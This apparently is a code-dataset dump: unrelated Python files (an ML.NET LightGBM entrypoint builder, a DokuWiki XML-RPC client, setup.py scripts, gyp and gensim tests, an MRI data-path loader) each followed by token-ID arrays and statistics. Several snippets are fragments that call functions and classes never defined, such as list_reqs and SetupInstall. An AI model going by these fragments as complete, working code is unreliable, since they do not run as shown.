obj=unbalanced_sets, none_acceptable=True, is_of_type=bool) if weight_of_positive_examples is not None: inputs['WeightOfPositiveExamples'] = try_set( obj=weight_of_positive_examples, none_acceptable=True, is_of_type=numbers.Real) if sigmoid is not None: inputs['Sigmoid'] = try_set( obj=sigmoid, none_acceptable=True, is_of_type=numbers.Real) if evaluation_metric is not None: inputs['EvaluationMetric'] = try_set( obj=evaluation_metric, none_acceptable=True, is_of_type=str, values=[ 'None', 'Default', 'Logloss', 'Error', 'AreaUnderCurve']) if maximum_bin_count_per_feature is not None: inputs['MaximumBinCountPerFeature'] = try_set( obj=maximum_bin_count_per_feature, none_acceptable=True, is_of_type=numbers.Real) if verbose is not None: inputs['Verbose'] = try_set( obj=verbose, none_acceptable=True, is_of_type=bool) if silent is not None: inputs['Silent'] = try_set( obj=silent, none_acceptable=True, is_of_type=bool) if number_of_threads is not None: inputs['NumberOfThreads'] = try_set( obj=number_of_threads, none_acceptable=True, is_of_type=numbers.Real) if early_stopping_round is not None: inputs['EarlyStoppingRound'] = try_set( obj=early_stopping_round, none_acceptable=True, is_of_type=numbers.Real) if batch_size is not None: inputs['BatchSize'] = try_set( obj=batch_size, none_acceptable=True, is_of_type=numbers.Real) if 
use_categorical_split is not None: inputs['UseCategoricalSplit'] = try_set( obj=use_categorical_split, none_acceptable=True, is_of_type=bool) if handle_missing_value is not None: inputs['HandleMissingValue'] = try_set( obj=handle_missing_value, none_acceptable=True, is_of_type=bool) if use_zero_as_missing_value is not None: inputs['UseZeroAsMissingValue'] = try_set( obj=use_zero_as_missing_value, none_acceptable=True, is_of_type=bool) if minimum_example_count_per_group is not None: inputs['MinimumExampleCountPerGroup'] = try_set( obj=minimum_example_count_per_group, none_acceptable=True, is_of_type=numbers.Real, valid_range={ 'Inf': 0, 'Max': 2147483647}) if maximum_categorical_split_point_count is not None: inputs['MaximumCategoricalSplitPointCount'] = try_set( obj=maximum_categorical_split_point_count, none_acceptable=True, is_of_type=numbers.Real, valid_range={ 'Inf': 0, 'Max': 2147483647}) if categorical_smoothing is not None: inputs['CategoricalSmoothing'] = try_set( obj=categorical_smoothing, none_acceptable=True, is_of_type=numbers.Real, valid_range={'Min': 0.0}) if l2_categorical_regularization is not None: inputs['L2CategoricalRegularization'] = try_set( obj=l2_categorical_regularization, none_acceptable=True, is_of_type=numbers.Real, valid_range={'Min': 0.0}) if seed is not None: inputs['Seed'] = try_set( obj=seed, none_acceptable=True, is_of_type=numbers.Real) if parallel_trainer is not None: inputs['ParallelTrainer'] = try_set( obj=parallel_trainer, none_acceptable=True, is_of_type=dict) if predictor_model is not None: outputs['PredictorModel'] = try_set( obj=predictor_model, none_acceptable=False, is_of_type=str) input_variables = { x for x in unlist(inputs.values()) if isinstance(x, str) and x.startswith("$")} output_variables = { x for x in unlist(outputs.values()) if isinstance(x, str) and x.startswith("$")} entrypoint = EntryPoint( name=entrypoint_name, inputs=inputs, outputs=outputs, input_variables=input_variables, output_variables=output_variables) return entrypoint
[ 2, 532, 2980, 515, 416, 4899, 14, 13000, 4122, 62, 5589, 5329, 13, 9078, 25, 466, 407, 4370, 416, 1021, 198, 37811, 198, 44077, 364, 13, 15047, 38, 20475, 33, 3219, 9487, 7483, 198, 37811, 198, 198, 11748, 3146, 198, 198, 6738, 1148...
2.173328
5,354
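For context, a minimal sketch of how an entrypoint builder like the trainers_lightgbmbinaryclassifier function in the row above might be invoked. The "$"-prefixed strings and the surrounding call are assumptions inferred from the function's own input_variables/output_variables handling; they are not part of the dataset row.

# Sketch only: assumes trainers_lightgbmbinaryclassifier is importable from the
# module shown in the row above, and that "$"-prefixed strings denote graph
# variables (as suggested by the startswith("$") checks in its body).
ep = trainers_lightgbmbinaryclassifier(
    training_data="$training_data",      # required input (none_acceptable=False)
    predictor_model="$predictor_model",  # required output
    number_of_iterations=100,
    learning_rate=0.2,
    number_of_leaves=31,
)
# ep is an EntryPoint object describing the 'Trainers.LightGbmBinaryClassifier' node.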
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Radim Rehurek <radimrehurek@seznam.cz>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html

"""
Automated tests for checking transformation algorithms (the models package).
"""

import logging
import unittest

import numpy as np

from gensim.corpora.mmcorpus import MmCorpus
from gensim.models import rpmodel
from gensim import matutils
from gensim.test.utils import datapath, get_tmpfile


if __name__ == '__main__':
    logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.DEBUG)
    unittest.main()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 198, 2, 15069, 357, 34, 8, 3050, 5325, 320, 797, 71, 495, 74, 1279, 6335, 320, 260, 71, 495, 74, 31, 325, 89, ...
2.699571
233
import tensorflow as tf
from tensorflow import keras
[ 11748, 11192, 273, 11125, 355, 48700, 198, 6738, 11192, 273, 11125, 1330, 41927, 292, 628, 198 ]
3.4375
16
import base64 import datetime import logging import os import time from typing import List, Tuple import structlog import tenacity from averbis import Pipeline from fhir.resources.bundle import Bundle from fhir.resources.codeableconcept import CodeableConcept from fhir.resources.composition import Composition, CompositionSection from fhir.resources.documentreference import DocumentReference from fhir.resources.fhirtypes import DateTime from fhir.resources.identifier import Identifier from fhir.resources.reference import Reference from fhir.resources.resource import Resource from prometheus_client import Counter, Histogram, Summary from tenacity.after import after_log from ahd2fhir.mappers import ahd_to_condition, ahd_to_medication_statement from ahd2fhir.utils.bundle_builder import BundleBuilder from ahd2fhir.utils.custom_mappers import custom_mappers, mapper_functions from ahd2fhir.utils.device_builder import build_device from ahd2fhir.utils.fhir_utils import sha256_of_identifier MAPPING_FAILURES_COUNTER = Counter("mapping_failures", "Exceptions during mapping") MAPPING_DURATION_SUMMARY = Histogram( "map_duration_seconds", "Time spent mapping", buckets=( 0.05, 0.1, 0.5, 1.0, 2.0, 3.0, 5.0, 8.0, 13.0, 21.0, 34.0, 55.0, "inf", ), ) EXTRACTED_RESOURCES_COUNT_SUMMARY = Summary( "extracted_resources", "Number of extracted resources for each processed document" ) DOCUMENT_LENGTH_SUMMARY = Summary( "document_length", "Length of each processed document's text in charactes", ) DISCHARGE_SUMMARY_CONCEPT_TEXT = ( "Clinical document Kind of document from LOINC Document Ontology" ) DISCHARGE_SUMMARY_CONCEPT = CodeableConcept( **{ "coding": [ { "system": "http://loinc.org", "code": "74477-1", "display": DISCHARGE_SUMMARY_CONCEPT_TEXT, }, ], "text": DISCHARGE_SUMMARY_CONCEPT_TEXT, } ) AHD_TYPE_DOCUMENT_ANNOTATION = "de.averbis.types.health.DocumentAnnotation" AHD_TYPE_MEDICATION = "de.averbis.types.health.Medication" AHD_TYPE_DIAGNOSIS = "de.averbis.types.health.Diagnosis" log = structlog.get_logger()
[ 11748, 2779, 2414, 198, 11748, 4818, 8079, 198, 11748, 18931, 198, 11748, 28686, 198, 11748, 640, 198, 6738, 19720, 1330, 7343, 11, 309, 29291, 198, 198, 11748, 2878, 6404, 198, 11748, 3478, 4355, 198, 6738, 9076, 41907, 1330, 37709, 198,...
2.463124
922
# -*- coding: utf-8 -*-
from selectable.decorators import login_required
from maestros.models import TiposMedidasActuacion, TiposLimitesCriticos, TiposMedidasVigilancia, TiposTemperaturas, TiposFrecuencias, Zonas, Terceros, CatalogoEquipos, Personal, Consumibles, ParametrosAnalisis, Actividades, Etapas, Peligros, TiposCursos, TiposLegislacion, Unidades, Firmas, HorarioTurnos
from selectable.base import ModelLookup
from selectable.registry import registry
from maestros_generales.models import Empresas
from siva import settings

__author__ = 'julian'


registry.register(TPActuacionPrevLookup)
registry.register(TPActuacionCorrLookup)
registry.register(TPLimitesCritLookup)
registry.register(ActividadesLookup)
registry.register(TipoMedidasVigilanciaLookup)
registry.register(TiposTemperaturasLookup)
registry.register(TiposFrecuenciasLookup)
registry.register(ZonasLookup)
registry.register(TercerosLookup)
registry.register(TercerosTiposLookup)
registry.register(CatalogoEquiposLookup)
registry.register(PersonalLookup)
registry.register(TiposCursosLookup)
registry.register(TiposLegislacionLookup)
registry.register(ConsumiblesLookup)
registry.register(ParametrosAnalisisLookup)
registry.register(EtapasLookup)
registry.register(PeligrosLookup)
registry.register(UnidadesLookup)
registry.register(FirmasLookup)
registry.register(HorarioTurnoLookup)
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 6738, 2922, 540, 13, 12501, 273, 2024, 1330, 17594, 62, 35827, 198, 6738, 17266, 395, 4951, 13, 27530, 1330, 23095, 418, 9921, 24496, 6398, 84, 49443, 11, 23095, 418, 19...
2.805274
493
"""Define commands for Python 2.7""" import argparse import traceback from . import util from .cmd import run from .cmd import extractpipenv def main(): """Main function""" print("This version is not supported! It has limitted analysis features") parser = argparse.ArgumentParser(description='Analyze Jupyter Notebooks') subparsers = parser.add_subparsers() run.create_subparsers(subparsers) extractpipenv.create_subparsers(subparsers) args, rest = parser.parse_known_args() try: if not getattr(args, 'func', None): parser.print_help() else: args.func(args, rest) if not util.EXITED: util.do_exit(0) except: # pylint: disable=bare-except if not util.EXITED: traceback.print_exc() util.do_exit(1)
[ 37811, 7469, 500, 9729, 329, 11361, 362, 13, 22, 37811, 198, 11748, 1822, 29572, 198, 11748, 12854, 1891, 198, 198, 6738, 764, 1330, 7736, 198, 6738, 764, 28758, 1330, 1057, 198, 6738, 764, 28758, 1330, 7925, 79, 541, 24330, 198, 198, ...
2.37931
348
#!/usr/bin/env python

import os
import imp

gpcrondump_path = os.path.abspath('gpcrondump')
gpcrondump = imp.load_source('gpcrondump', gpcrondump_path)

import unittest2 as unittest
from datetime import datetime
from gppylib import gplog
from gpcrondump import GpCronDump
from gppylib.operations.utils import DEFAULT_NUM_WORKERS
from mock import patch, Mock
from gppylib.operations.dump import MailDumpEvent
from gppylib.operations.backup_utils import get_backup_directory, write_lines_to_file
import mock

logger = gplog.get_unittest_logger()

#------------------------------- Mainline --------------------------------
if __name__ == '__main__':
    unittest.main()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 28686, 198, 11748, 848, 198, 31197, 6098, 623, 931, 62, 6978, 796, 28686, 13, 6978, 13, 397, 2777, 776, 10786, 31197, 6098, 623, 931, 11537, 198, 31197, 6098, 623, 931, 796...
3.004505
222
#!/usr/bin/env python

'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements.  See the NOTICE file
distributed with this work for additional information
regarding copyright ownership.  The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License.  You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''

import os
from mock.mock import MagicMock, call, patch
from stacks.utils.RMFTestCase import *
import datetime, sys, socket
import resource_management.libraries.functions
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 7061, 6, 198, 26656, 15385, 284, 262, 24843, 10442, 5693, 357, 1921, 37, 8, 739, 530, 198, 273, 517, 18920, 5964, 11704, 13, 220, 4091, 262, 28536, 2393, 198, 17080, 6169, 351, ...
3.894309
246
#!/usr/bin/env python

# Copyright (c) 2017 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""
Verifies the use of linker flags in environment variables.

In this test, gyp and build both run in same local environment.
"""

import TestGyp

import re
import subprocess
import sys

FORMATS = ('make', 'ninja')

if sys.platform.startswith('linux'):
  test = TestGyp.TestGyp(formats=FORMATS)

  CHDIR = 'ldflags-from-environment'
  with TestGyp.LocalEnv({'LDFLAGS': '-Wl,--dynamic-linker=/target',
                         'LDFLAGS_host': '-Wl,--dynamic-linker=/host',
                         'GYP_CROSSCOMPILE': '1'}):
    test.run_gyp('test.gyp', chdir=CHDIR)
    test.build('test.gyp', chdir=CHDIR)

  if GetDynamicLinker('ldflags') != '/target':
    test.fail_test()

  if GetDynamicLinker('ldflags_host') != '/host':
    test.fail_test()

  test.pass_test()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 357, 66, 8, 2177, 3012, 3457, 13, 1439, 2489, 10395, 13, 198, 2, 5765, 286, 428, 2723, 2438, 318, 21825, 416, 257, 347, 10305, 12, 7635, 5964, 326, 460, 307, 198, 2,...
2.503958
379
# -*- coding: utf-8 -*-

from .context import sample
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 6738, 764, 22866, 1330, 6291, 628 ]
2.571429
21
######################################################################
# LeetCode Problem Number : 145
# Difficulty Level       : Medium
# URL : https://leetcode.com/problems/binary-tree-postorder-traversal/
######################################################################
from binary_search_tree.tree_node import TreeNode
[ 29113, 29113, 4242, 2235, 198, 2, 1004, 316, 10669, 20647, 7913, 1058, 20299, 198, 2, 27419, 5684, 1058, 13398, 198, 2, 10289, 1058, 3740, 1378, 293, 316, 8189, 13, 785, 14, 1676, 22143, 14, 39491, 12, 21048, 12, 7353, 2875, 12, 9535,...
4.984615
65
# -*- coding: utf-8 -*- """This python module aims to manage `DokuWiki <https://www.dokuwiki.org/dokuwiki>`_ wikis by using the provided `XML-RPC API <https://www.dokuwiki.org/devel:xmlrpc>`_. It is compatible with python2.7 and python3+. Installation ------------ It is on `PyPi <https://pypi.python.org/pypi/dokuwiki>`_ so you can use the ``pip`` command to install it:: pip install dokuwiki Otherwise sources are in `github <https://github.com/fmenabe/python-dokuwiki>`_ """ import re import sys import base64 import weakref from xml.parsers.expat import ExpatError if sys.version_info[0] == 3: from xmlrpc.client import ServerProxy, Binary, Fault, Transport from urllib.parse import urlencode else: from xmlrpclib import ServerProxy, Binary, Fault, Transport from urllib import urlencode from datetime import datetime, timedelta ERR = 'XML or text declaration not at start of entity: line 2, column 0' _URL_RE = re.compile(r'(?P<proto>https?)://(?P<host>[^/]*)(?P<uri>/.*)?') def date(date): """DokuWiki returns dates of `xmlrpclib`/`xmlrpc.client` ``DateTime`` type and the format changes between DokuWiki versions ... This function convert *date* to a `datetime` object. """ date = date.value return (datetime.strptime(date[:-5], '%Y-%m-%dT%H:%M:%S') if len(date) == 24 else datetime.strptime(date, '%Y%m%dT%H:%M:%S')) def utc2local(date): """DokuWiki returns date with a +0000 timezone. This function convert *date* to the local time. """ date_offset = (datetime.now() - datetime.utcnow()) #Python < 2.7 don't have the 'total_seconds' method so calculate it by hand! date_offset = (date_offset.microseconds + (date_offset.seconds + date_offset.days * 24 * 3600) * 1e6) / 1e6 date_offset = int(round(date_offset / 60 / 60)) return date + timedelta(hours=date_offset) def add_acl(self, scope, user, permission): """Add an `ACL <https://www.dokuwiki.org/acl>`_ rule that restricts the page/namespace *scope* to *user* (use *@group* syntax for groups) with *permission* level. It returns a boolean that indicate if the rule was correctly added. """ return self.send('plugin.acl.addAcl', scope, user, permission) def del_acl(self, scope, user): """Delete any ACL matching the given *scope* and *user* (or group if *@group* syntax is used). It returns a boolean that indicate if the rule was correctly removed. """ return self.send('plugin.acl.delAcl', scope, user) class _Pages(object): """This object regroup methods for managing pages of a DokuWiki. This object is accessible from the ``pages`` property of an `DokuWiki` instance:: wiki = dokuwiki.DokuWiki('URL', 'User', 'Password') wiki.pages.list() """ def list(self, namespace='/', **options): """List all pages of the given *namespace*. Valid *options* are: * *depth*: (int) recursion level, 0 for all * *hash*: (bool) do an md5 sum of content * *skipacl*: (bool) list everything regardless of ACL """ return self._dokuwiki.send('dokuwiki.getPagelist', namespace, options) def changes(self, timestamp): """Returns a list of changes since given *timestamp*. For example, for returning all changes since *2016-01-01*:: from datetime import datetime wiki.pages.changes(datetime(2016, 1, 1).timestamp()) """ return self._dokuwiki.send('wiki.getRecentChanges', timestamp) def search(self, string): """Performs a fulltext search on *string* and returns the first 15 results. """ return self._dokuwiki.send('dokuwiki.search', string) def versions(self, page, offset=0): """Returns the available versions of *page*. *offset* can be used to list earlier versions in the history. 
""" return self._dokuwiki.send('wiki.getPageVersions', page, offset) def info(self, page, version=None): """Returns informations of *page*. Informations of the last version is returned if *version* is not set. """ return (self._dokuwiki.send('wiki.getPageInfoVersion', page, version) if version is not None else self._dokuwiki.send('wiki.getPageInfo', page)) def get(self, page, version=None): """Returns the content of *page*. The content of the last version is returned if *version* is not set. """ return (self._dokuwiki.send('wiki.getPageVersion', page, version) if version is not None else self._dokuwiki.send('wiki.getPage', page)) def append(self, page, content, **options): """Appends *content* text to *page*. Valid *options* are: * *sum*: (str) change summary * *minor*: (bool) whether this is a minor change """ return self._dokuwiki.send('dokuwiki.appendPage', page, content, options) def html(self, page, version=None): """Returns HTML content of *page*. The HTML content of the last version of the page is returned if *version* is not set. """ return (self._dokuwiki.send('wiki.getPageHTMLVersion', page, version) if version is not None else self._dokuwiki.send('wiki.getPageHTML', page)) def set(self, page, content, **options): """Set/replace the *content* of *page*. Valid *options* are: * *sum*: (str) change summary * *minor*: (bool) whether this is a minor change """ try: return self._dokuwiki.send('wiki.putPage', page, content, options) except ExpatError as err: # Sometime the first line of the XML response is blank which raise # the 'ExpatError' exception although the change has been done. This # allow to ignore the error. if str(err) != ERR: raise DokuWikiError(err) def delete(self, page): """Delete *page* by setting an empty content.""" return self.set(page, '') def lock(self, page): """Locks *page*.""" result = self._dokuwiki.send('dokuwiki.setLocks', lock=[page], unlock=[]) if result['lockfail']: raise DokuWikiError('unable to lock page') def unlock(self, page): """Unlocks *page*.""" result = self._dokuwiki.send('dokuwiki.setLocks', lock=[], unlock=[page]) if result['unlockfail']: raise DokuWikiError('unable to unlock page') def permission(self, page): """Returns the permission level of *page*.""" return self._dokuwiki.send('wiki.aclCheck', page) def links(self, page): """Returns a list of all links contained in *page*.""" return self._dokuwiki.send('wiki.listLinks', page) def backlinks(self, page): """Returns a list of all links referencing *page*.""" return self._dokuwiki.send('wiki.getBackLinks', page) class _Medias(object): """This object regroup methods for managing medias of a DokuWiki. This object is accessible from the ``medias`` property of an `DokuWiki` instance:: wiki = dokuwiki.DokuWiki('URL', 'User', 'Password') wiki.medias.list() """ def list(self, namespace='/', **options): """Returns all medias of the given *namespace*. Valid *options* are: * *depth*: (int) recursion level, 0 for all * *skipacl*: (bool) skip acl checking * *pattern*: (str) check given pattern * *hash*: (bool) add hashes to result list """ return self._dokuwiki.send('wiki.getAttachments', namespace, options) def changes(self, timestamp): """Returns the list of medias changed since given *timestamp*. 
For example, for returning all changes since *2016-01-01*:: from datetime import datetime wiki.medias.changes(datetime(2016, 1, 1).timestamp()) """ return self._dokuwiki.send('wiki.getRecentMediaChanges', timestamp) def get(self, media, dirpath=None, filename=None, overwrite=False, b64decode=False): """Returns the binary data of *media* or save it to a file. If *dirpath* is not set the binary data is returned, otherwise the data is saved to a file. By default, the filename is the name of the media but it can be changed with *filename* parameter. *overwrite* parameter allow to overwrite the file if it already exists locally. """ import os data = self._dokuwiki.send('wiki.getAttachment', media) data = base64.b64decode(data) if b64decode else data.data if dirpath is None: return data if filename is None: filename = media.replace('/', ':').split(':')[-1] if not os.path.exists(dirpath): os.makedirs(dirpath) filepath = os.path.join(dirpath, filename) if os.path.exists(filepath) and not overwrite: raise FileExistsError("[Errno 17] File exists: '%s'" % filepath) with open(filepath, 'wb') as fhandler: fhandler.write(data) def info(self, media): """Returns informations of *media*.""" return self._dokuwiki.send('wiki.getAttachmentInfo', media) def add(self, media, filepath, overwrite=True): """Set *media* from local file *filepath*. *overwrite* parameter specify if the media must be overwrite if it exists remotely. """ with open(filepath, 'rb') as fhandler: self._dokuwiki.send('wiki.putAttachment', media, Binary(fhandler.read()), ow=overwrite) def set(self, media, _bytes, overwrite=True, b64encode=False): """Set *media* from *_bytes*. *overwrite* parameter specify if the media must be overwrite if it exists remotely. """ data = base64.b64encode(_bytes) if b64encode else Binary(_bytes) self._dokuwiki.send('wiki.putAttachment', media, data, ow=overwrite) def delete(self, media): """Delete *media*.""" return self._dokuwiki.send('wiki.deleteAttachment', media) class Dataentry(object): """Object that manage `data entries <https://www.dokuwiki.org/plugin:data>`_."""
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 37811, 1212, 21015, 8265, 12031, 284, 6687, 198, 63, 35, 11601, 32603, 1279, 5450, 1378, 2503, 13, 67, 11601, 15466, 13, 2398, 14, 67, 11601, 15466, 29, 63, 62, 4...
2.479991
4,248
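The dokuwiki module in the row above documents its own entry points in docstrings (DokuWiki, pages, medias). A minimal usage sketch based only on those docstrings follows; the URL, credentials, page and media names are placeholders, not values from the row.

# Sketch assuming the dokuwiki package from the row above is installed.
import dokuwiki

wiki = dokuwiki.DokuWiki('https://wiki.example.org', 'user', 'password')
print(wiki.pages.list(namespace='/', depth=0))     # all pages of the wiki
print(wiki.pages.get('wiki:syntax'))               # raw content of one page
wiki.medias.add('wiki:logo.png', '/tmp/logo.png')  # upload a local file as a media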
import setuptools
import re

with open("README.md", "r") as fh:
    long_description = fh.read()

# get version from _version.py file, from below
# https://stackoverflow.com/questions/458550/standard-way-to-embed-version-into-python-package
VERSION_FILE = "test_aide/_version.py"
version_file_str = open(VERSION_FILE, "rt").read()
VERSION_STR_RE = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(VERSION_STR_RE, version_file_str, re.M)
if mo:
    version = mo.group(1)
else:
    raise RuntimeError("Unable to find version string in %s." % (VERSION_FILE,))

setuptools.setup(
    name="test-aide",
    version=version,
    author="LV GI Data Science Team",
    author_email="#DataSciencePackages@lv.co.uk",
    description="Package of helper functions to be used for unit testing",
    long_description=long_description,
    long_description_content_type="text/markdown",
    packages=setuptools.find_packages(),
    install_requires=list_reqs(),
    python_requires=">=3.6",
    classifiers=[
        "Programming Language :: Python",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Operating System :: OS Independent",
        "License :: OSI Approved :: BSD License",
    ],
)
[ 11748, 900, 37623, 10141, 198, 11748, 302, 198, 198, 4480, 1280, 7203, 15675, 11682, 13, 9132, 1600, 366, 81, 4943, 355, 277, 71, 25, 198, 220, 220, 220, 890, 62, 11213, 796, 277, 71, 13, 961, 3419, 198, 198, 2, 651, 2196, 422, 48...
2.709091
495
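The setup() call in the row above passes install_requires=list_reqs(), but list_reqs is not defined in the snippet. A plausible definition is sketched below; the file name "requirements.txt" is an assumption, the real project may read a different file.

# Hypothetical helper for the setup.py above; not part of the dataset row.
def list_reqs(fname="requirements.txt"):
    """Return the package requirements listed one per line in *fname*."""
    with open(fname) as fd:
        return fd.read().splitlines()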
"""Simple matshow() example.""" from matplotlib.pylab import * def samplemat(dims): """Make a matrix with all zeros and increasing elements on the diagonal""" aa = zeros(dims) for i in range(min(dims)): aa[i, i] = i return aa # Display 2 matrices of different sizes dimlist = [(12, 12), (15, 35)] for d in dimlist: matshow(samplemat(d)) # Display a random matrix with a specified figure number and a grayscale # colormap matshow(rand(64, 64), fignum=100, cmap=cm.gray) show()
[ 37811, 26437, 46054, 4919, 3419, 1672, 526, 15931, 198, 6738, 2603, 29487, 8019, 13, 79, 2645, 397, 1330, 1635, 628, 198, 4299, 6291, 6759, 7, 67, 12078, 2599, 198, 220, 220, 220, 37227, 12050, 257, 17593, 351, 477, 1976, 27498, 290, ...
2.642487
193
#! /usr/bin/env python3

import importlib
import logging
import os
import subprocess

from setuptools import setup
from setuptools.command.install import install as install
from setuptools.command.develop import develop as develop

logger = logging.getLogger(__name__)

stan_model_files = [
    os.path.join("nonperiodic", "no-periodicity.stan"),
    os.path.join("nonperiodic", "start-high-high-low.stan"),
    os.path.join("nonperiodic", "start-high-low-high.stan"),
    os.path.join("periodic", "start-high-low-low.stan"),
    os.path.join("untranslated", "gaussian-naive-bayes.stan"),
    os.path.join("translated", "periodic-gaussian-mixture.stan")
]

stan_pickle_files = [
    os.path.join("nonperiodic", "no-periodicity.pkl"),
    os.path.join("nonperiodic", "start-high-high-low.pkl"),
    os.path.join("nonperiodic", "start-high-low-high.pkl"),
    os.path.join("periodic", "start-high-low-low.pkl"),
    os.path.join("untranslated", "gaussian-naive-bayes.pkl"),
    os.path.join("translated", "periodic-gaussian-mixture.pkl")
]

setup(
    cmdclass={
        'install': SetupInstall,
        'develop': SetupDevelop
    }
)
[ 2, 0, 1220, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 11748, 1330, 8019, 198, 11748, 18931, 198, 11748, 28686, 198, 11748, 850, 14681, 198, 198, 6738, 900, 37623, 10141, 1330, 9058, 198, 6738, 900, 37623, 10141, 13, 21812, 13, ...
2.566292
445
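The setup() call in the row above wires SetupInstall and SetupDevelop into cmdclass, but neither class appears in the snippet. The sketch below shows the usual shape of such command subclasses under the assumption that they post-process the listed Stan models; the compilation/pickling step is inferred from the stan_model_files and stan_pickle_files lists, not taken from the row.

# Hedged sketch of the missing command classes, reusing the install/develop
# imports and the logger defined in the snippet above.
class SetupInstall(install):
    def run(self):
        install.run(self)
        # e.g. compile each *.stan model and cache it as the matching *.pkl
        logger.info("compiling %d Stan models", len(stan_model_files))


class SetupDevelop(develop):
    def run(self):
        develop.run(self)
        logger.info("compiling %d Stan models", len(stan_model_files))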
import os import h5py import nibabel as nb import numpy as np import torch import torch.utils.data as data from torchvision import transforms import utils.preprocessor as preprocessor # transform_train = transforms.Compose([ # transforms.RandomCrop(200, padding=56), # transforms.ToTensor(), # ]) # def load_file_paths(data_dir, label_dir, volumes_txt_file=None): # """ # This function returns the file paths combined as a list where each element is a 2 element tuple, 0th being data and 1st being label. # It should be modified to suit the need of the project # :param data_dir: Directory which contains the data files # :param label_dir: Directory which contains the label files # :param volumes_txt_file: (Optional) Path to the a csv file, when provided only these data points will be read # :return: list of file paths as string # """ # # volume_exclude_list = ['IXI290', 'IXI423'] # if volumes_txt_file: # with open(volumes_txt_file) as file_handle: # volumes_to_use = file_handle.read().splitlines() # else: # volumes_to_use = [name for name in os.listdir(data_dir) if # name.startswith('IXI') and name not in volume_exclude_list] # # file_paths = [ # [os.path.join(data_dir, vol, 'mri/orig.mgz'), os.path.join(label_dir, vol, 'mri/aseg.auto_noCCseg.mgz')] # for # vol in volumes_to_use] # return file_paths def load_file_paths(data_dir, label_dir, data_id, volumes_txt_file=None): """ This function returns the file paths combined as a list where each element is a 2 element tuple, 0th being data and 1st being label. It should be modified to suit the need of the project :param data_dir: Directory which contains the data files :param label_dir: Directory which contains the label files :param data_id: A flag indicates the name of Dataset for proper file reading :param volumes_txt_file: (Optional) Path to the a csv file, when provided only these data points will be read :return: list of file paths as string """ if volumes_txt_file: with open(volumes_txt_file) as file_handle: volumes_to_use = file_handle.read().splitlines() else: volumes_to_use = [name for name in os.listdir(data_dir)] if data_id == "MALC": file_paths = [ [os.path.join(data_dir, vol, 'mri/orig.mgz'), os.path.join(label_dir, vol + '_glm.mgz')] for vol in volumes_to_use] elif data_id == "ADNI": file_paths = [ [os.path.join(data_dir, vol, 'orig.mgz'), os.path.join(label_dir, vol, 'Lab_con.mgz')] for vol in volumes_to_use] elif data_id == "CANDI": file_paths = [ [os.path.join(data_dir, vol + '/' + vol + '_1.mgz'), os.path.join(label_dir, vol + '/' + vol + '_1_seg.mgz')] for vol in volumes_to_use] elif data_id == "IBSR": file_paths = [ [os.path.join(data_dir, vol, 'mri/orig.mgz'), os.path.join(label_dir, vol + '_map.nii.gz')] for vol in volumes_to_use] elif data_id == "BORIS": #BORIS file_paths = [ [os.path.join(data_dir, vol), os.path.join(label_dir, vol.replace('.nii', '_seg.nii'))] for vol in volumes_to_use] else: raise ValueError("Invalid entry, valid options are MALC, ADNI, CANDI and IBSR") return file_paths def load_file_paths_eval(data_dir, volumes_txt_file, dir_struct): """ This function returns the file paths combined as a list where each element is a 2 element tuple, 0th being data and 1st being label. 
It should be modified to suit the need of the project :param data_dir: Directory which contains the data files :param volumes_txt_file: Path to the a csv file, when provided only these data points will be read :param dir_struct: If the id_list is in FreeSurfer style or normal :return: list of file paths as string """ with open(volumes_txt_file) as file_handle: volumes_to_use = file_handle.read().splitlines() if dir_struct == "FS": file_paths = [ [os.path.join(data_dir, vol, 'mri/orig.mgz')] for vol in volumes_to_use] elif dir_struct == "Linear": file_paths = [ [os.path.join(data_dir, vol)] for vol in volumes_to_use] elif dir_struct == "part_FS": file_paths = [ [os.path.join(data_dir, vol, 'orig.mgz')] for vol in volumes_to_use] else: raise ValueError("Invalid entry, valid options are FS and Linear") return file_paths
[ 11748, 28686, 198, 198, 11748, 289, 20, 9078, 198, 11748, 33272, 9608, 355, 299, 65, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 28034, 198, 11748, 28034, 13, 26791, 13, 7890, 355, 1366, 198, 6738, 28034, 10178, 1330, 31408, 198, 11...
2.340405
2,027
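The load_file_paths() function in the row above documents its parameters in its docstring. The call below is purely illustrative; the directories and the volumes file are placeholder paths, not values from the row.

# Illustrative call of load_file_paths() for the MALC layout described above.
file_paths = load_file_paths(
    data_dir="/data/MALC/images",
    label_dir="/data/MALC/labels",
    data_id="MALC",
    volumes_txt_file="/data/MALC/train_volumes.txt",
)
print(file_paths[0])  # [<vol>/mri/orig.mgz, <vol>_glm.mgz] pair for the first volume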
import argparse
import yaml
import sys

from .conf import MysqlConf
from lib.db import mysql

parser = argparse.ArgumentParser()
parser.add_argument("--config", help="config file name", type=str, required=False, default='office')
input_args = parser.parse_args()
